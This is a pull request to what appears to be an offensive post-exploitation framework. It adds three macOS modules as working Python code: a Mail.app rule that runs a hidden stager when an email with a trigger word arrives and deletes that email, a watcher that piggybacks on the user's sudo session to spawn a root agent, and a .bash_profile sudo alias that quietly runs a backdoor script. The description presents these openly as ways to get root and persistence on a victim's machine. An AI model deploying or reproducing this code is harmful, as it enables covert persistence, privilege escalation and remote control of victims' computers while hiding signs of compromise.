### PR TITLE
Module - Sudo Piggyback + Mail Persistence + Bash Profile Backdoor

### DIFF
--- a/lib/modules/python/persistence/osx/mail.py
+++ b/lib/modules/python/persistence/osx/mail.py
@@ -1,0 +1,223 @@
+from time import time
+from random import choice
+from string import ascii_uppercase
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'Mail',
+
+            # list of one or more authors for the module
+            'Author': ['@n00py'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Installs a mail rule that will execute an AppleScript stager when a trigger word is present in the Subject of an incoming mail.'),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : None,
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': ['https://github.com/n00py/MailPersist']
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                # The 'Agent' option is the only one that MUST be in a module
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
+                'Required'      :   True,
+                'Value'         :   'True'
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            },
+            'RuleName' : {
+                'Description'   :   'Name of the Rule.',
+                'Required'      :   True,
+                'Value'         :   'Spam Filter'
+            },
+            'Trigger' : {
+                'Description'   :   'The trigger word.',
+                'Required'      :   True,
+                'Value'         :   'Harambe'
+            }
+        }
+#
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+
+        ruleName = self.options['RuleName']['Value']
+        trigger = self.options['Trigger']['Value']
+        listenerName = self.options['Listener']['Value']
+        userAgent = self.options['UserAgent']['Value']
+        LittleSnitch = self.options['LittleSnitch']['Value']
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
+        launcher = launcher.replace('"', '\\"')
+        launcher = launcher.replace('"', '\\"')
+        launcher = "do shell script \"%s\"" % (launcher)
+        hex = '0123456789ABCDEF'
+        def UUID():
+            return ''.join([choice(hex) for x in range(8)]) + "-" + ''.join(
+                [choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(4)]) + "-" + ''.join(
+                [choice(hex) for x in range(4)]) + "-" + ''.join([choice(hex) for x in range(12)])
+        CriterionUniqueId = UUID()
+        RuleId = UUID()
+        with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
+            v = a.read()
+            version = "V1"
+            if "10.7" in v:
+                version = "V2"
+            if "10.7" in v:
+                version = "V2"
+            if "10.8" in v:
+                version = "V2"
+            if "10.9" in v:
+                version = "V2"
+            if "10.10" in v:
+                version = "V2"
+            if "10.11" in v:
+                version = "V3"
+            if "10.12" in v:
+                version = "V4"
+            a.close()
+        TimeStamp = str(int(time()))[0:9]
+        SyncedRules = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
+        RulesActiveState = "/tmp/" + ''.join(choice(ascii_uppercase) for i in range(12))
+        AppleScript = ''.join(choice(ascii_uppercase) for i in range(12)) + ".scpt"
+        plist = '''<?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <array>
+        <dict>
+        		<key>AllCriteriaMustBeSatisfied</key>
+        		<string>NO</string>
+        		<key>AppleScript</key>
+        		<string>''' + AppleScript + '''</string>
+        		<key>AutoResponseType</key>
+        		<integer>0</integer>
+        		<key>Criteria</key>
+        		<array>
+        			<dict>
+        				<key>CriterionUniqueId</key>
+        				<string>''' + CriterionUniqueId + '''</string>
+        				<key>Expression</key>
+        				<string>''' + str(trigger) + '''</string>
+        				<key>Header</key>
+        				<string>Subject</string>
+        			</dict>
+        		</array>
+        		<key>Deletes</key>
+        		<string>YES</string>
+        		<key>HighlightTextUsingColor</key>
+        		<string>NO</string>
+        		<key>MarkFlagged</key>
+        		<string>NO</string>
+        		<key>MarkRead</key>
+        		<string>NO</string>
+        		<key>NotifyUser</key>
+        		<string>NO</string>
+        		<key>RuleId</key>
+        		<string>''' + RuleId + '''</string>
+        		<key>RuleName</key>
+        		<string>''' + str(ruleName) + '''</string>
+        		<key>SendNotification</key>
+        		<string>NO</string>
+        		<key>ShouldCopyMessage</key>
+        		<string>NO</string>
+        		<key>ShouldTransferMessage</key>
+        		<string>NO</string>
+        		<key>TimeStamp</key>
+        		<integer>''' + TimeStamp + '''</integer>
+        		<key>Version</key>
+        		<integer>1</integer>
+        	</dict>
+        </array>
+        </plist>'''
+        plist2 = '''<?xml version="1.0" encoding="UTF-8"?>
+        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+        <plist version="1.0">
+        <dict>
+        	<key>''' + RuleId + '''</key>
+        	<true/>
+        </dict>
+        </plist>
+        	'''
+        script = """
+import os
+home =  os.getenv("HOME")
+AppleScript = '%s'
+SyncedRules = '%s'
+RulesActiveState = '%s'
+plist = \"\"\"%s\"\"\"
+plist2 = \"\"\"%s\"\"\"
+payload = \'\'\'%s\'\'\'
+payload = payload.replace('&\"', '& ')
+payload += "kill `ps -ax | grep ScriptMonitor |grep -v grep |  awk \'{print $1}\'`"
+payload += '\"'
+script = home + "/Library/Application Scripts/com.apple.mail/" + AppleScript
+
+os.system("touch " + SyncedRules)
+with open(SyncedRules, 'w+') as f:
+    f.write(plist)
+    f.close()
+
+os.system("touch " + RulesActiveState)
+with open(RulesActiveState, 'w+') as f:
+    f.write(plist2)
+    f.close()
+
+with open(script, 'w+') as f:
+    f.write(payload)
+    f.close()
+
+if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/V3/MailData/ubiquitous_SyncedRules.plist"):
+    os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/%s/MailData/ubiquitous_SyncedRules.plist")
+else:
+    os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/%s/MailData/SyncedRules.plist")
+
+os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/%s/MailData/RulesActiveState.plist")
+os.system("rm " + SyncedRules)
+os.system("rm " + RulesActiveState)
+
+        """ % (AppleScript, SyncedRules, RulesActiveState, plist, plist2, launcher, version, version, version)
+        return script

--- a/lib/modules/python/persistence/osx/mail.py
+++ b/lib/modules/python/persistence/osx/mail.py
@@ -71,7 +71,7 @@ class Module:
             'Trigger' : {
                 'Description'   :   'The trigger word.',
                 'Required'      :   True,
-                'Value'         :   'Harambe'
+                'Value'         :   ''
             }
         }
 #
@@ -218,11 +218,11 @@ with open("/System/Library/CoreServices/SystemVersion.plist", 'r') as a:
             a.close()
 
 if os.path.isfile(home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"):
-    print "Trying to write to Mobile"
+    print "Writing to " + home + "/Library/Mobile Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist"
     os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mobile\ Documents/com~apple~mail/Data/" + version + "/MailData/ubiquitous_SyncedRules.plist")
 else:
     os.system("/usr/libexec/PlistBuddy -c 'Merge " + SyncedRules + "' " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist")
-    print "Writing to main rules"
+    print "Writing to " + home + "/Library/Mail/" + version + "/MailData/SyncedRules.plist"
 
 os.system("/usr/libexec/PlistBuddy -c 'Merge " + RulesActiveState + "' "+ home + "/Library/Mail/" + version + "/MailData/RulesActiveState.plist")
 os.system("rm " + SyncedRules)

--- a/lib/modules/python/persistence/osx/mail.py
+++ b/lib/modules/python/persistence/osx/mail.py
@@ -28,6 +28,12 @@ class Module:
             # True if the method doesn't touch disk/is reasonably opsec safe
             'OpsecSafe' : False,
 
+            # the module language
+            'Language': 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion': '2.6',
+
             # list of any references/other comments
             'Comments': ['https://github.com/n00py/MailPersist']
         }
@@ -46,11 +52,6 @@ class Module:
                 'Description'   :   'Listener to use.',
                 'Required'      :   True,
                 'Value'         :   ''
-            },
-            'LittleSnitch' : {
-                'Description'   :   'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
-                'Required'      :   True,
-                'Value'         :   'True'
             },
             'UserAgent' : {
                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
@@ -90,8 +91,7 @@ class Module:
         trigger = self.options['Trigger']['Value']
         listenerName = self.options['Listener']['Value']
         userAgent = self.options['UserAgent']['Value']
-        LittleSnitch = self.options['LittleSnitch']['Value']
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent)
         launcher = launcher.replace('"', '\\"')
         launcher = launcher.replace('"', '\\"')
         launcher = "do shell script \"%s\"" % (launcher)

--- a/lib/modules/python/persistence/osx/mail.py
+++ b/lib/modules/python/persistence/osx/mail.py
@@ -27,7 +27,7 @@ class Module:
 
             # True if the method doesn't touch disk/is reasonably opsec safe
             'OpsecSafe' : False,
-
+ 
             # the module language
             'Language': 'python',
 

--- a/lib/modules/python/persistence/osx/mail.py
+++ b/lib/modules/python/persistence/osx/mail.py
@@ -27,7 +27,7 @@ class Module:
 
             # True if the method doesn't touch disk/is reasonably opsec safe
             'OpsecSafe' : False,
- 
+
             # the module language
             'Language': 'python',
 
@@ -71,7 +71,7 @@ class Module:
             'Trigger' : {
                 'Description'   :   'The trigger word.',
                 'Required'      :   True,
-                'Value'         :   'Harambe'
+                'Value'         :   ''
             }
         }
 #

--- a/lib/modules/python/privesc/multi/bashdoor.py
+++ b/lib/modules/python/privesc/multi/bashdoor.py
@@ -1,0 +1,107 @@
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'bashdoor',
+
+            # list of one or more authors for the module
+            'Author': ['@n00py'],
+
+            # more verbose multi-line description of the module
+            'Description': 'Creates an alias in the .bash_profile to cause the sudo command to execute a stager and pass through the origional command back to sudo',
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # the module language
+            'Language' : 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion' : '2.6',
+
+            # list of any references/other comments
+            'Comments': []
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'SafeChecks': {
+                'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
+                'Required': True,
+                'Value': 'True'
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+
+        # extract all of our options
+        listenerName = self.options['Listener']['Value']
+        userAgent = self.options['UserAgent']['Value']
+        safeChecks = self.options['SafeChecks']['Value']
+        # generate the launcher code
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=True, userAgent=userAgent, safeChecks=safeChecks)
+        launcher = launcher.replace('"', '\\"')
+        script = '''
+import os
+from random import choice
+from string import ascii_uppercase
+home =  os.getenv("HOME")
+randomStr = ''.join(choice(ascii_uppercase) for i in range(12))
+bashlocation = home + "/Library/iTunes/." + randomStr + ".sh"
+with open(home + "/.bash_profile", "a") as profile:
+    profile.write("alias sudo='sudo sh -c '\\\\''" + bashlocation + " & exec \\"$@\\"'\\\\'' sh'")
+launcher = "%s"
+stager = "#!/bin/bash\\n"
+stager += launcher
+with open(bashlocation, 'w') as f:
+    f.write(stager)
+    f.close()
+os.chmod(bashlocation, 0755)
+''' % (launcher)
+        return script
+
+

--- a/lib/modules/python/privesc/multi/bashdoor.py
+++ b/lib/modules/python/privesc/multi/bashdoor.py
@@ -91,7 +91,7 @@ from random import choice
 from string import ascii_uppercase
 home =  os.getenv("HOME")
 randomStr = ''.join(choice(ascii_uppercase) for i in range(12))
-bashlocation = home + "/Library/iTunes/." + randomStr + ".sh"
+bashlocation = home + "/Library/." + randomStr + ".sh"
 with open(home + "/.bash_profile", "a") as profile:
     profile.write("alias sudo='sudo sh -c '\\\\''" + bashlocation + " & exec \\"$@\\"'\\\\'' sh'")
 launcher = "%s"

--- a/lib/modules/python/privesc/osx/piggyback.py
+++ b/lib/modules/python/privesc/osx/piggyback.py
@@ -1,0 +1,116 @@
+from lib.common import helpers
+
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        # metadata info about the module, not modified during runtime
+        self.info = {
+            # name for the module that will appear in module menus
+            'Name': 'SudoPiggyback',
+
+            # list of one or more authors for the module
+            'Author': ['@n00py'],
+
+            # more verbose multi-line description of the module
+            'Description': ('Spawns a new EmPyre agent using an existing sudo session.'),
+
+            # True if the module needs to run in the background
+            'Background' : False,
+
+            # File extension to save the file as
+            'OutputExtension' : "",
+
+            # if the module needs administrative privileges
+            'NeedsAdmin' : False,
+
+            # True if the method doesn't touch disk/is reasonably opsec safe
+            'OpsecSafe' : False,
+
+            # list of any references/other comments
+            'Comments': ['Inspired by OS X Incident Response by Jason Bradley']
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to execute module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'Listener' : {
+                'Description'   :   'Listener to use.',
+                'Required'      :   True,
+                'Value'         :   ''
+            },
+            'LittleSnitch' : {
+                'Description'   :   'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
+                'Required'      :   True,
+                'Value'         :   'True'
+            },
+            'UserAgent' : {
+                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
+                'Required'      :   False,
+                'Value'         :   'default'
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+
+        # During instantiation, any settable option parameters
+        #   are passed as an object set to the module and the
+        #   options dictionary is automatically set. This is mostly
+        #   in case options are passed on the command line
+        if params:
+            for param in params:
+                # parameter format is [Name, Value]
+                option, value = param
+                if option in self.options:
+                    self.options[option]['Value'] = value
+
+    def generate(self):
+
+        # extract all of our options
+        listenerName = self.options['Listener']['Value']
+        userAgent = self.options['UserAgent']['Value']
+        LittleSnitch = self.options['LittleSnitch']['Value']
+
+        isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
+        if not isEmpire:
+            print helpers.color("[!] EmPyre listener required!")
+            return ""
+
+        # generate the launcher code
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
+
+        if launcher == "":
+            print helpers.color("[!] Error in launcher command generation.")
+            return ""
+        else:
+            launcher = launcher.replace("'", "\\'")
+            launcher = launcher.replace('echo', '')
+            parts = launcher.split("|")
+            launcher = "sudo python -c %s" % (parts[0])
+            script = """
+import os
+import time
+import subprocess
+sudoDir = "/var/db/sudo"
+subprocess.call(['sudo -K'], shell=True)
+oldTime = time.ctime(os.path.getmtime(sudoDir))
+exitLoop=False
+while exitLoop is False:
+    newTime = time.ctime(os.path.getmtime(sudoDir))
+    if oldTime != newTime:
+        try:
+            subprocess.call(['%s'], shell=True)
+            exitLoop = True
+        except:
+            pass
+            """ % (launcher)
+            return script

--- a/lib/modules/python/privesc/osx/piggyback.py
+++ b/lib/modules/python/privesc/osx/piggyback.py
@@ -14,7 +14,7 @@ class Module:
             'Author': ['@n00py'],
 
             # more verbose multi-line description of the module
-            'Description': ('Spawns a new EmPyre agent using an existing sudo session.'),
+            'Description': ('Spawns a new EmPyre agent using an existing sudo session.  This works up until El Capitan.'),
 
             # True if the module needs to run in the background
             'Background' : False,
@@ -52,6 +52,11 @@ class Module:
                 'Required'      :   True,
                 'Value'         :   ''
             },
+            'SafeChecks': {
+                'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
+                'Required': True,
+                'Value': 'True'
+            },
             'UserAgent' : {
                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                 'Required'      :   False,
@@ -79,13 +84,11 @@ class Module:
         # extract all of our options
         listenerName = self.options['Listener']['Value']
         userAgent = self.options['UserAgent']['Value']
-        isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
-        if not isEmpire:
-            print helpers.color("[!] EmPyre listener required!")
-            return ""
+        safeChecks = self.options['SafeChecks']['Value']
+
 
         # generate the launcher code
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent)
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', userAgent=userAgent, safeChecks=safeChecks)
 
         if launcher == "":
             print helpers.color("[!] Error in launcher command generation.")

--- a/lib/modules/python/privesc/osx/piggyback.py
+++ b/lib/modules/python/privesc/osx/piggyback.py
@@ -28,6 +28,12 @@ class Module:
             # True if the method doesn't touch disk/is reasonably opsec safe
             'OpsecSafe' : False,
 
+            # the module language
+            'Language': 'python',
+
+            # the minimum language version needed
+            'MinLanguageVersion': '2.6',
+
             # list of any references/other comments
             'Comments': ['Inspired by OS X Incident Response by Jason Bradley']
         }
@@ -45,11 +51,6 @@ class Module:
                 'Description'   :   'Listener to use.',
                 'Required'      :   True,
                 'Value'         :   ''
-            },
-            'LittleSnitch' : {
-                'Description'   :   'Switch. Check for the LittleSnitch process, exit the staging process if it is running. Defaults to True.',
-                'Required'      :   True,
-                'Value'         :   'True'
             },
             'UserAgent' : {
                 'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
@@ -78,15 +79,13 @@ class Module:
         # extract all of our options
         listenerName = self.options['Listener']['Value']
         userAgent = self.options['UserAgent']['Value']
-        LittleSnitch = self.options['LittleSnitch']['Value']
-
         isEmpire = self.mainMenu.listeners.is_listener_empyre(listenerName)
         if not isEmpire:
             print helpers.color("[!] EmPyre listener required!")
             return ""
 
         # generate the launcher code
-        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent, littlesnitch=LittleSnitch)
+        launcher = self.mainMenu.stagers.generate_launcher(listenerName, userAgent=userAgent)
 
         if launcher == "":
             print helpers.color("[!] Error in launcher command generation.")


### PR DESCRIPTION
**Sudo Piggyback**
![screen shot 2016-10-08 at 11 04 39 am](https://cloud.githubusercontent.com/assets/14309124/19215091/3d185726-8d49-11e6-8da4-61d0b6687f16.png)


This works by default up to El Capitan.  When you use sudo, it is not bound to your TTY and has a 5 minute timer from which you can use sudo again without a password.  This script clears the sudo timer, monitors the directory which holds the sudo timestamp, and once it notices a modification (Which means the user ran sudo) it triggers a launcher using sudo, sending back a root shell.  This is nice because nothing is dropped.


**Mail Persistence**

![screen shot 2016-10-08 at 12 45 25 pm](https://cloud.githubusercontent.com/assets/14309124/19215544/1d01d324-8d56-11e6-9593-50bcc180ae21.png)

This module works by creating a rule in Mail.app to trigger an Empire stager when an email is received with a specified trigger word.  

It detects to version of OS X/MacOS in use, and first attempts to write the rule in the location where iCloud syncs mail rules.  In the absence of that, it writes the rule to the standard location.  When determining Mail rules, iCloud takes precedence and will overwrite the main location.  

The mail rule deletes the incoming trigger email when received.  The payload that is executed is a modified AppleScript stager than also kills the Script Monitor process to remove visual indicators.  

**Bashdoor**
![screen shot 2016-10-10 at 1 53 05 pm](https://cloud.githubusercontent.com/assets/14309124/19250808/29220bc8-8ef1-11e6-9c6b-3b7a7ed644f9.png)

This module modifies the user's .bash_profile to alias "sudo" to a command that triggers a bash stager and passes the original command to sudo.  This allows for the attacker to receive an agent as root when the victim runs sudo. This will spawn an agent everytime sudo is ran. 
